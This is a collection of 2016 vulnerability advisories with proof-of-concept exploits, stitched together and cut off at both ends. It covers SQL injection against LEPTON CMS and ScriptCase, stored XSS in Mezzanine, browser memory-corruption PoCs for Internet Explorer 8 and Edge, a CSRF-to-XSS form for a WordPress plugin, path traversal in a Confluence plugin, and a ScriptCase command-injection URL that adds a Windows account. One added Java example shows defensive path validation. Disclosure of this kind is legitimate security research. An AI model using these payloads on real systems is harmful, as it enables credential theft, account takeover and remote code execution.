search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

title=test&type=wysiwyg&parent=0 union select version()&visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 277

tool=droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute='Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
 
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Mezzanine 4.2.0
Fixed in:            4.2.1
Fixed Version Link:  https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website:      http://mezzanine.jupo.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in Python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges, the other one does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment, as author name use: '"><img src=no onerror=alert(1)>
To trigger the payload, view the comment overview in the admin backend:
http://localhost:8000/admin/generic/threadedcomment

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file:
http://localhost:8000/admin/media-library/upload/?ot=desc&o=date
As uploaded files are stored inside the web root, it can now be accessed, thus
executing the JavaScript code it contains:
http://localhost:8000/static/media/uploads/xss.html

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:

https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
            
<!--
Source: http://blog.skylined.nl/20161116001.html

Synopsis

A specially crafted web-page can cause the Javascript engine of Microsoft Internet Explorer 8 to free memory used for a string. The code will keep a reference to the string and can be forced to reuse it when compiling a regular expression.

Known affected software, attack vectors and mitigations

Microsoft Internet Explorer 8

An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
-->

<!DOCTYPE html>
<html>
  <script>
    // This PoC attempts to exploit a use-after-free bug in Microsoft Internet
    // Explorer 8.
    // See http://blog.skylined.nl/20161116001.html for details.
    var r=new RegExp("A|x|x|xx|xxxxxxxxxxxxxxxxxxxx+", "g");
    "A".replace(r, function (){
      // Force OLEAUT32 to free the string
      for (var j = 0; j < 16; j++) new Array(0x1000).join("B");
      // Reuse the freed memory
      r.compile();
    });
    // This work by SkyLined is licensed under a Creative Commons
    // Attribution-Non-Commercial 4.0 International License. 
  </script>
</html>

<!--
Description

Recompiling the regular expression pattern during a replace can cause the code to reuse a freed string, but only if the string is freed from the cache by allocating and freeing a number of strings of certain size, as explained by Alexander Sotirov in his Heap Feng-Shui presentation.

Exploit

Exploitation was not investigated.

Time-line

March 2015: This vulnerability was found through fuzzing.
March 2015: This vulnerability was submitted to ZDI.
April 2015: This vulnerability was acquired by ZDI.
October 2015: Microsoft addressed this issue in MS15-018.
November 2016: Details of this issue are released.
-->
            
<!--
Source: http://blog.skylined.nl/20161118002.html

Synopsis

A specially crafted web-page can cause an integer underflow in Microsoft Edge. This causes CTextExtractor::GetBlockText to read data outside of the bounds of a memory block.

Known affected software, attack vectors and mitigations

Microsoft Edge 11.0.10240.16384

An attacker would need to get a target user to open a specially crafted web-page. JavaScript is not necessarily required to trigger the issue.

Repro.html

<!DOCTYPE html>
<style>
  *::first-letter{ border: 0; }
  *{ white-space: pre-line; }
</style>
<body>
  A<script>alert();</script>&#xD;&#xD;B
</body>

Description

Though I did not investigate thoroughly, I did find out the following:

The root cause appears to be an integer underflow in a 32-bit variable used in CTextExtractor::GetBlockText as an index to read a WCHAR in a string buffer. This index is decreased once too often and becomes -1, or a very large positive number depending on how it is used.
This does not result in a crash on 32-bit systems, as an integer wrap causes the code to read one WCHAR before the start of the buffer, which is normally also in allocated memory.
On 64-bit systems, the 32-bit -1 value is interpreted as 0xFFFFFFFF, a very large positive value. As this is an index into a WCHAR string, it gets multiplied by two and added to the start of the buffer to find the location of a WCHAR to read. This causes the OOB read to be around 8Gb (!!) beyond the address at which the buffer is allocated.
The crash happens in code that appears to be rendering the web-page, which does not immediately offer an obvious way of extracting information using this bug.

Exploit

This is where it gets interesting, as the OOB read happens approximately 0x2`00000000 bytes after the address at which the buffer is allocated. This presents us with a problem: how to store some information that we'd be interested in reading at such a large offset from the original allocation?

As one might come to expect from me, I used a heap spray. But it needed to be a special kind of heap spray as I did not want to actually have to allocate 8Gb of RAM. However, about ten years ago (boy, time flies!) I developed a heap spray that uses significantly less RAM than a traditional heap spray does; in practice probably about 33% in most cases, but theoretically much more in ideal situations. I've been meaning to blog about it, but never found the time to do so until today: you can read all about it here.

That said, I have not actually looked at whether it is possible to exfiltrate useful information using this bug. However, I did write a Proof-of-Concept that attempts to make sure something is allocated in the area where the OOB read happens. This PoC uses these heap spray tricks to spray the heap while minimizing memory use. The Proof-of-Concept uses about ~5.3Gb to allocate the memory at around 8Gb distance from the buffer (up to ~10Gb to be sure). When you load the PoC in a 64-bit version of Edge, you may notice that, unlike the original repro, it will not crash Edge (even though it does trigger the issue): the heap spray has allocated the memory that the out-of-bounds read accesses, and this prevents an access violation exception. Refreshing the page is likely to screw up the precise allocation process needed and will probably cause a crash.

This proves that it is theoretically possible to allocate information at the address used by the code. All that is left is to prove that the information read by the code can be exfiltrated somehow, and you have a working exploit. This is left as an exercise to the reader.
-->

<!DOCTYPE html>
<style>
  *::first-letter{ border: 0; }
  *{ white-space: pre-line; }
</style>
<body>
  A<script>
    var aiAllocationSizes = [             // max address ------.    .---- RAM allocated
      -0x4000, //  4000                                      4000  4000
       0x1000, //    |   1000                                5000  5000
      -0x5000, // -4000    |   5000                          a000  6000
       0x5000, //          |     |   5000                    f000  b000
      -0x7000, //          |  -5000    |   7000             16000  d000
       0x6000, //          |           |     |   6000       1c000 13000
      -0x8000, //          |           |  -7000    |   8000 24000 14000 (5.3Gb)
    ];
    var aoHeap = [],
        oToBeFreed;
    aiAllocationSizes.forEach(function (iAllocationSize) {
      if (iAllocationSize < 0 && oToBeFreed) {
        console.log("-0x" + oToBeFreed.byteLength.toString(16));
        oToBeFreed = null; // Free the heap block that was queued to be freed.
        CollectGarbage();
      }
      var uAllocationSize = Math.abs(iAllocationSize) * 0x10000 - 1;
      console.log("+0x" + uAllocationSize.toString(16));
      var oArrayBuffer = new ArrayBuffer(uAllocationSize);
      if (iAllocationSize < 0) {
        oToBeFreed = oArrayBuffer; // Schedule this to be freed
      } else {
        //aoHeap.push(oArrayBuffer);
      }
    });
  </script>&#xD;&#xD;B
</body>

<!--
Time-line

June 2016: This vulnerability was found through fuzzing.
June 2016: This vulnerability was submitted to ZDI and iDefense.
July 2016: This vulnerability was acquired by ZDI.
September 2016: This vulnerability was addressed by Microsoft in MS16-104.
November 2016: Details of this issue are released.
-->
            
<!--
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html

Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF
Abstract
A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160724-0014

Tested versions
This issue was successfully tested on the Instagram Feed WordPress Plugin version 1.4.6.2.

Fix
This issue is resolved in Instagram Feed WordPress Plugin version 1.4.7.

Introduction
Instagram Feed is a WordPress plugin to display beautifully clean, customizable, and responsive feeds from multiple Instagram accounts. A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.

Details
The settings page of the Instagram Feed plugin does not perform CSRF checks. It's possible to change all settings in the plugin by making an authenticated administrator perform a request to change the settings (CSRF). It's possible to change the Instagram access token and id to show images of other users. It's also possible to inject malicious JavaScript in the Customize section, to perform Persistent Cross-Site Scripting. After the CSRF attack, the attacker's payload is injected into the page of any user visiting the Instagram Feed.

Proof of Concept
Have an authenticated admin visit a webpage with the following form:
-->

<html>
<body>
<form action="http://<wordpress site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize" method="POST">
<input type="hidden" name="sb&#95;instagram&#95;settings&#95;hidden&#95;field" value="Y" />
<input type="hidden" name="sb&#95;instagram&#95;customize&#95;hidden&#95;field" value="Y" />
<input type="hidden" name="sb&#95;instagram&#95;width" value="100" />
<input type="hidden" name="sb&#95;instagram&#95;width&#95;unit" value="&#37;" />
<input type="hidden" name="sb&#95;instagram&#95;height" value="100" />
<input type="hidden" name="sb&#95;instagram&#95;height&#95;unit" value="&#37;" />
<input type="hidden" name="sb&#95;instagram&#95;background" value="&#35;474747" />
<input type="hidden" name="sb&#95;instagram&#95;sort" value="none" />
<input type="hidden" name="sb&#95;instagram&#95;num" value="20" />
<input type="hidden" name="sb&#95;instagram&#95;cols" value="4" />
<input type="hidden" name="sb&#95;instagram&#95;image&#95;res" value="auto" />
<input type="hidden" name="sb&#95;instagram&#95;image&#95;padding" value="5" />
<input type="hidden" name="sb&#95;instagram&#95;image&#95;padding&#95;unit" value="px" />
<input type="hidden" name="sb&#95;instagram&#95;show&#95;header" value="on" />
<input type="hidden" name="sb&#95;instagram&#95;header&#95;color" value="" />
<input type="hidden" name="sb&#95;instagram&#95;show&#95;btn" value="on" />
<input type="hidden" name="sb&#95;instagram&#95;btn&#95;background" value="" />
<input type="hidden" name="sb&#95;instagram&#95;btn&#95;text&#95;color" value="" />
<input type="hidden" name="sb&#95;instagram&#95;btn&#95;text" value="Load&#32;More&#46;&#46;&#46;" />
<input type="hidden" name="sb&#95;instagram&#95;show&#95;follow&#95;btn" value="on" />
<input type="hidden" name="sb&#95;instagram&#95;folow&#95;btn&#95;background" value="" />
<input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text&#95;color" value="" />
<input type="hidden" name="sb&#95;instagram&#95;follow&#95;btn&#95;text" value="Follow&#32;on&#32;Instagram" />
<input type="hidden" name="sb&#95;instagram&#95;exclude&#95;words" value="" />
<input type="hidden" name="sb&#95;instagram&#95;include&#95;words" value="" />
<input type="hidden" name="sb&#95;instagram&#95;hide&#95;photos" value="" />
<input type="hidden" name="sb&#95;instagram&#95;block&#95;users" value="" />
<input type="hidden" name="sb&#95;instagram&#95;custom&#95;css" value="" />
<input type="hidden" name="sb&#95;instagram&#95;custom&#95;js" value="&#125;&#13;&#10;&#125;&#41;&#59;<&#47;script><script>alert&#40;1&#41;&#59;<&#47;script>&#13;&#10;" />
<input type="hidden" name="submit" value="Save&#32;Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

<!-- The Custom JavaScript section will now be saved with the attacker's JavaScript payload. -->
            
RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        AppFusions Doxygen for Atlassian Confluence
Vendor URL:     www.appfusions.com
Type:           Path Traversal [CWE-22]
Date found:     2016-06-23
Date published: -
CVSSv3 Score:   6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE:            -


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.


4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
 C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and
 UNO/OpenOffice flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
 dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The application offers the functionality to import zipped Doxygen
documentations via a file upload to make them available within a
Confluence page. However the application does not properly validate the
"tempId" parameter, which represents the directory where the contents of
the uploaded file will be extracted and stored to. This leads to a path
traversal vulnerability when "/../" sequences are used as part of the
"tempId" parameter. Since the contents of the uploaded file are
extracted to the traversed directory, this vulnerability could also lead
to Remote Code Execution.

In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
read as part of a GET request to "/plugins/servlet/doxygen/upload" and
afterwards used in a "getTemporaryDirectory()" call:

String tempId = request.getParameter("tempId");
String destination = this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();

The "getTemporaryDirectory()" function is defined in
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
based on the "java.io.tmpdir" variable, the static string
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
between all parts:

public File getTemporaryDirectory(String tempId) {
    File file = new File(System.getProperty("java.io.tmpdir") +
            File.separator + "doxygen-temp" + File.separator + tempId);
    return file;
}

In the subsequent code the uploaded file as represented by the "file"
HTTP POST parameter to "/plugins/servlet/doxygen/upload" is extracted to
the directory which was built using the "file" object.
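
A hardened form of this directory construction beside the concatenation quoted
above, as an added example (it is not AppFusions' code and not their fix). The
class name, the token allow-list and the "/tmp" base are assumptions; the last
method applies the same containment test to archive entry names, which goes
beyond the "tempId" case described here.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.regex.Pattern;

public class TempDirDemo {
    // Assumption: legitimate tempId values are short opaque tokens.
    private static final Pattern SAFE_ID = Pattern.compile("[A-Za-z0-9_-]{1,64}");

    // Same construction as the quoted getTemporaryDirectory(): concatenation only.
    static File unsafeTemporaryDirectory(String tmpDir, String tempId) {
        return new File(tmpDir + File.separator + "doxygen-temp" + File.separator + tempId);
    }

    // Hardened variant: allow-list the id, then confirm that the normalized
    // result is still a child of the doxygen-temp root.
    static Path safeTemporaryDirectory(String tmpDir, String tempId) throws IOException {
        if (tempId == null || !SAFE_ID.matcher(tempId).matches()) {
            throw new IOException("tempId rejected by allow-list");
        }
        Path root = Paths.get(tmpDir, "doxygen-temp").toAbsolutePath().normalize();
        Path dir = root.resolve(tempId).normalize();
        // Path.startsWith compares whole path elements, so a sibling such as
        // "doxygen-temp2" does not pass as it would with a string prefix test.
        // normalize() is lexical only: where symlinks may exist below the root,
        // compare toRealPath() results of the existing directories instead.
        if (!dir.startsWith(root) || dir.equals(root)) {
            throw new IOException("tempId escapes " + root);
        }
        return dir;
    }

    // The same containment test for every entry name of the uploaded archive,
    // applied before the entry is written. extractDir must be absolute and
    // normalized, as returned by safeTemporaryDirectory().
    static Path safeEntryTarget(Path extractDir, String entryName) throws IOException {
        Path target = extractDir.resolve(entryName).normalize();
        if (!target.startsWith(extractDir)) {
            throw new IOException("archive entry escapes extraction directory: " + entryName);
        }
        return target;
    }

    public static void main(String[] args) throws IOException {
        String tmpDir = "/tmp"; // constructed stand-in for java.io.tmpdir
        // First id is a constructed benign token; second is the value from the advisory.
        String[] ids = { "a1b2c3", "/../../../../../../home/confluence", "..", "x/../../y" };
        for (String id : ids) {
            System.out.println("tempId=" + id);
            System.out.println("  unsafe -> "
                    + unsafeTemporaryDirectory(tmpDir, id).getCanonicalPath());
            try {
                System.out.println("  safe   -> " + safeTemporaryDirectory(tmpDir, id));
            } catch (IOException e) {
                System.out.println("  safe   -> rejected: " + e.getMessage());
            }
        }

        Path dir = safeTemporaryDirectory(tmpDir, "a1b2c3");
        // Constructed entry names: one ordinary, one relative escape, one absolute.
        String[] entries = { "html/index.html", "../../outside.txt", "/etc/outside.txt" };
        for (String entry : entries) {
            try {
                System.out.println("entry " + entry + " -> " + safeEntryTarget(dir, entry));
            } catch (IOException e) {
                System.out.println("entry " + entry + " -> rejected");
            }
        }
    }
}
```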

The following Proof-of-Concept triggers this vulnerability by uploading
a zipped file, which will be extracted to "/home/confluence" by the
application: 

POST /plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 966
Content-Type: multipart/form-data; boundary=---------------------------62841490314755966452122422550
Cookie: doc-sidebar=300px; doxygen_width=256; JSESSIONID=75A487B49F38A536358C728B1BE5A9E1
Connection: close

-----------------------------62841490314755966452122422550
Content-Disposition: form-data; name="file"; filename="Traversal.zip"
Content-Type: application/zip

[zipped data]
-----------------------------98001232218371736091795669059--


6. RISK
=======
To successfully exploit this vulnerability the attacker must be
authenticated and must have the rights within Atlassian Confluence to
upload Doxygen files (default).

The vulnerability allows remote attackers to upload arbitrary files to
any destination directory writeable by the user of the web server, which
could lead to Remote Code Execution.


7. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4


8. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/06/2016: Discovery of the vulnerability
23/06/2016: Notified vendor via public security mail address
29/06/2016: No response, sent out another notification w/o details
29/06/2016: Response from vendor who asked for full details
30/06/2016: Sent over preliminary advisory with full details
03/07/2016: No response from vendor, sent out a status request
03/07/2016: Vendor temporarily removes product from website
11/07/2016: Vendor releases v1.3.1 which fixes the issue
20/11/2016: Advisory released
            
<!--
Source: http://www.security-assessment.com/files/documents/advisory/edge_chakra_mem_corruption.pdf

Name: Microsoft Edge Scripting Engine Memory Corruption Vulnerability (MS16-129)
CVE: CVE-2016-7202
Vendor Website: http://www.microsoft.com/
Date Released: 09/11/2016
Affected Software: Microsoft Windows 10, Microsoft Windows Server 2016
Researchers: Scott Bell

Description

A memory corruption vulnerability was identified in the Microsoft Edge Chakra JavaScript engine which could
allow a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the
current user.

Exploitation

Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can
generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like this
are often hosted on legitimate websites which have been compromised by other means.

The following table shows some cursory debug information:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00040001 ebx=01b1e760 ecx=00000012 edx=00000006 esi=00000000 edi=03f60000
eip=6a714bea esp=0328fa80 ebp=0328fab0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
jscript9!Recycler::ScanObject+0x23:
6a714bea 8b37 mov esi,dword ptr [edi] ds:0023:03f60000=????????
2:046> k
ChildEBP RetAddr
0328fab0 6a589768 jscript9!Recycler::ScanObject+0x23
0328facc 6a58973a jscript9!Recycler::TryMarkBigBlockList+0x22
0328faf0 6a589d83 jscript9!Recycler::ScanArena+0x7a
0328fb24 6a585f4c jscript9!Recycler::BackgroundFindRoots+0x8e
0328fb34 6a561263 jscript9!Recycler::DoBackgroundWork+0x103
0328fb60 6a6b162c jscript9!Recycler::ThreadProc+0xd1
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\system32\msvcrt.dll -
0328fb98 775c1287 jscript9!Recycler::StaticThreadProc+0x1c
WARNING: Stack unwind information not available. Following frames may be wrong.
0328fbd0 775c1328 msvcrt!itow_s+0x4c
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\system32\kernel32.dll -
0328fbd8 7793ef1c msvcrt!endthreadex+0x6c
0328fbe4 777e3648 kernel32!BaseThreadInitThunk+0x12
0328fc24 777e361b ntdll!__RtlUserThreadStart+0x70
0328fc3c 00000000 ntdll!_RtlUserThreadStart+0x1b

The following proof of concept code can be used to reproduce the vulnerability:
-->

<html>
<META http-equiv="Expires" content="Tue, 20 Aug 1996 14:25:27 GMT">
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-5">
<body>
<script>try{
for(var z in "a") a1.set(a1, '' );
Array.prototype.sort.call(a1, 'a', a1)
a1 = this;
a2 = [];
a1 = a2.concat(a1.a1);
var a1 = new Iterator(a1);
a1.add(a1);
for (let zzz = 0; zzz < 117; ++zzz) {a1.unshift(a2, a1);}
a1.reverse();
Array.prototype.reverse.call(a1);
a1.splice(1, 10);
}catch(e){};</script>
</body>
</html>

<!--

Solution
Microsoft validated this security issue and issued a patch (MS16-129) to remedy it.
Security-Assessment.com recommends applying the patch which has been made available via Windows Update.

About Security-Assessment.com

Security-Assessment.com is a leading team of Information Security consultants specialising in providing high
quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of
the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify
and responsibly publish vulnerabilities in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release of whitepapers and
presentations related to new security research.

For further information on this issue or any of our service offerings, contact us:

Web www.security-assessment.com
Email info@security-assessment.com
-->
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/SCRIPTCASE-PHP-WEB-TOOL-MULTIPLE-VULNERABILITIES.txt

[+] ISR: ApparitionSec



Vendor:
==================
www.scriptcase.net



Product:
===================
ScriptCase
v8.1.053, v8.1.051, v8.1.43.0

scriptcase_install_en_us_v8.1.053.exe
hash: ceaba1fce05556b82ab37582a7c907f4

scriptcase_install_en_us_v8.1.051.exe
hash: c3c9fbe085ab5462304c0c73c8698946


ScriptCase RAD is a development platform for PHP applications, is web
oriented and can be installed in a server in the internet.



Vulnerability Type:
=============================
CSRF Remote Command Execution
CSRF Add Admin
SQL Injection
Cross Site Scripting
Local Privilege Escalation (Insecure File Permissions)
User Enumeration / Token Bypass

Downloaded latest version v8.1.053, and still vulnerable.



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

[CSRF Remote Command Execution]
Scriptcase has a remote command execution ailment via CSRF, triggered if an
authenticated user clicks an attacker's link etc. This can allow attackers
to run arbitrary system commands on the affected host and do things like
add accounts etc.

Scriptcase PHP code is encrypted / obfuscated, so it's not easy to test,
but we can see here the error returned for PHP eval()'d code
when injecting Array [] brackets or something similar as a parameter.

Parse error: syntax error, unexpected end of file, expecting ']' in C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase\devel\lib\php\functions2.inc.php(358) : eval()'d code on line 1

After trying to wrap a Windows system call in backtick "`" operators it
worked perfectly. This allowed me to add an arbitrary system
account to the affected system.



[CSRF]
There are several cross site request forgery vectors, allowing attackers to
add an Admin account to Scriptcase application etc.


[Cross Site Scripting]
Multiple XSS entry points exist within the vulnerable application, both GET
and POST.

Example of XSS vulnerable scriptcase code: 'ajax_cod_apls' is not sanitized
before being processed by an ajax HTTP POST request.

$.ajax({
  type: 'POST',
  url: '/scriptcase/devel/iface/generate.php',
  data: 'compile_app_ajax=S&gen_option=console&targ_frame=_self&console=yes&ajax_cod_apls='
        + str_open_apps,
  success: function(s_result){
    a_result = s_result.split('__compile_ajax_sep_row__');
    nm_compile_gerar();
  }
});



[Local Privilege Escalation]
scriptcase uses weak, insecure file permissions: the "Everyone" group has
full access to its files. This allows low privileged users to
execute arbitrary code in the security context of ANY other users with
elevated privileges on the affected system.

"Everyone" encompasses all users who have logged in with a password as well
as built-in, non-password protected accounts such as Guest
and LOCAL_SERVICE. Any user (even guest) will be able to replace, modify or
change the file. This would allow an attacker to
inject code or replace executables used by scriptcase and have them run in
the context of the system.



[User Enumeration]
On a failed scriptcase login the application returns one of the following in
the HTTP response.

"The login name provided is not registered on the system."
When the user name is correct but the password is wrong, the HTTP
response returns:
"The password is incorrect."




Exploit code(s):
===============

[CSRF Remote Command Execution]

Note: we NEED to use backtick operators "`"

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start net user EVIL abc123 /add`

Verify...

c:\> net user

User accounts for \\hyp3rlinx
------------------------------------------------------------------------
Administrator hyp3rlinx Guest
EVIL Test Privileged-User


2) start Windows 'calc.exe'
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`calc.exe`

OR

http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start calc.exe`

**sometimes "calc.exe" doesn't appear but it is running; use "tasklist /v |
findstr calc.exe" to verify it is in fact running.


4) Apache DOS (needs httpd environmental variable set)
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`taskkill /f /im httpd.exe`



[SQL Injection]

AND boolean-based blind - WHERE or HAVING clause in 'nrLinhas' parameter "10 AND 2=2"

<form action="http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php" method="post">
<input type="hidden" name="nOpc" value="1">
<input type="hidden" name="nOpr" value="0">
<input type="hidden" name="nColOrd" value="1">
<input type="hidden" name="nLogin" value="">
<input type="hidden" name="nFiltro" value="2">
<input type="hidden" name="filtroTipo" value="2">
<input type="hidden" name="filtroTexto" value="1">
<input type="hidden" name="nrLinhas" value="10 AND 2=2">
<input type="hidden" name="nrInicio" value="0">
<input type="hidden" name="maxReg" value="1">
<script>document.forms[0].submit()</script>
</form>



[CSRF Add Admin]

<form name="form_user" action=" http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php" method="POST">
<input type="hidden" name="nOpc" value="2">
<input type="hidden" name="nOpr" value="2">
<input type="hidden" name="nLogin" value="hyp3rlinx">
<input type="hidden" name="nMail" value="pwn@Done.com">
<input type="hidden" name="nPass[]" value="abc123">
<input type="text" name="nPass[]" value="abc123"/>
<input type="text" name="privBox%5B%5D" value="Priv_Admin" />
<input type="hidden" name="privBox%5B%5D" value="Priv_Proj" />
<input type="hidden" name="privBox%5B%5D" value="Priv_DataDictionary" />
<input type="hidden" name="privBox%5B%5D" value="Priv_Exec">
<input type="hidden" name="privBox%5B%5D" value="Priv_Export">
<input type="hidden" name="privBox%5B%5D" value="Priv_Library">
<input type="hidden" name="privBox%5B%5D" value="Priv_Reports">
<input type="hidden" name="privBox%5B%5D" value="Priv_Locales">
<input type="hidden" name="privBox%5B%5D" value="Priv_Publish">
<input type="hidden" name="privBox%5B%5D" value="Priv_Aba">
<input type="hidden" name="privBox%5B%5D" value="Priv_Blank">
<input type="hidden" name="privBox%5B%5D" value="Priv_Calendar">
<input type="hidden" name="privBox%5B%5D" value="Priv_Chart">
<input type="hidden" name="privBox%5B%5D" value="Priv_Cons">
<input type="hidden" name="privBox%5B%5D" value="Priv_Container">
